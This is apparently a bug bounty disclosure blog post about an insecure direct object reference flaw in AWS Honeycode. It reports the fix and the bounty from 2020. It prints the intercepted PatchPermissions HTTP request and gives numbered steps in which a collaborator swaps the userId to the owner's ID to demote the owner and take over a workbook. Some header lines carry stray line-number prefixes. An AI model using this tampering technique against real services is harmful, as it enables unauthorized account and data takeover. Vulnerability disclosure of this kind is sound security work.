Company Information :
Amazon Web Services, Inc. is a subsidiary of Amazon that provides on-demand cloud computing platforms and APIs to individuals, companies, and governments, on a metered, pay-as-you-go basis. Clients will often use this in combination with autoscaling.
Bug Category :
Insecure direct object reference(IDOR ) :
Insecure direct object reference is a type of access control vulnerability in digital security. This can occur when a web application or application programming interface uses an identifier for direct access to an object in an internal database but does not check for access control or authentication.
Target Information :
https://builder.honeycode.aws/
Technical Details of the Bug :
On https://builder.honeycode.aws you can add workbook and add users as collaborator. collaborator have limited access to the functionalities and sharing part. But there is a way which can lead to collaborator to demote the owner , remove him and takeover the Workbook.
Vulnerable HTTP request :
POST / HTTP/1.1
2Host: control.us-west-2.honeycode.aws
3Connection: close
4Content-Length: 472
5content-encoding: amz-1.0
6x-client-id: clientRegion|BeehiveSDSJSUtils||||
7x-amz-target: com.amazon.sheets.control.api.SheetsControlServiceAPI_20170701.PatchPermissions
8x-amz-requestsupertrace: true
9x-amzn-requestid: e162ac01-db10-445b-a06e-edea28186b45
10User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
11content-type: application/json
12Accept: */*
13Origin: https://builder.honeycode.aws
14Sec-Fetch-Site: same-site
15Sec-Fetch-Mode: cors
16Sec-Fetch-Dest: empty
17Accept-Encoding: gzip, deflate
18Accept-Language: en-US,en;q=0.9
19Cookie: [cookies]
20
21{"id":"arn:aws:sheets:us-west-2:122162422134:workbook:[workbookID]","grantPermissions":{"userPermissions":[{"userId":"[user_ID]","role":"collaborator"}],"emailSubject":"vijay g has shared Untitled1 with you","emailBody":"\nvijay g has shared \"Untitled1\" workbook and all of its apps with you.\n\nhttps://builder.honeycode.aws/sheet/1-us-west-2%3A122162422134%3Aworkbook%3A34c548e1-af8d-46ef-83a7-6dd98f9a0391\n "}}
Vulnerable Parameter : userId
Steps To Reproduce:
In order to reproduce the issue i will be taking 3 users. One as owner and 2 as team members.
owner account : owner@mail.com , test1 account : test1@mail.com and test2 account : test2@mail.com
1.Login from owner account and go to teams section.
2.Now add test1 and test2 accounts as Member.Complete all the approve process too.
Note : You can capture the hashed userIDs of these users from this section.
3.Now go to home page where you can add new workbook(Ex:owner workbook).
4.Add new workbook and on the share button add test1 user as collaborator.
5.Now login from test1 user account and go to the home page where you will find owner workbook.
6.Now click on share and you will notice that you will have option of adding new user to the workbook . But you can't make any changes to owner account and you can't assign owner role to any user including yourself.
7.Now add test2 account to owner workbook and intercept the request.
8.The request would look like above mentioned request.
9.Now change the userID to owner account user ID then it will be accepted by server and owner will be demoted to collaborator.
10.Now you will notice that The owner is not anymore the owner and he is demoted to collaborator.
11.Now from from test1 account you can delete the owner and you can takeover the sheet.
Steps To Reproduce:
Impact :
Takeover Workbook and delete the Owner on https://builder.honeycode.aws by collaborator user (IDOR)
Timeline :
June 26th 2020: Report send to AWS product Security Team through Hackerone.
June 26th 2020 : Report Accepted and Triaged.
July 02th 2020 : Complete issue was resolved and confirmed.
July 02th 2020 : 7200$ Bounty Rewarded
Comments
Post a Comment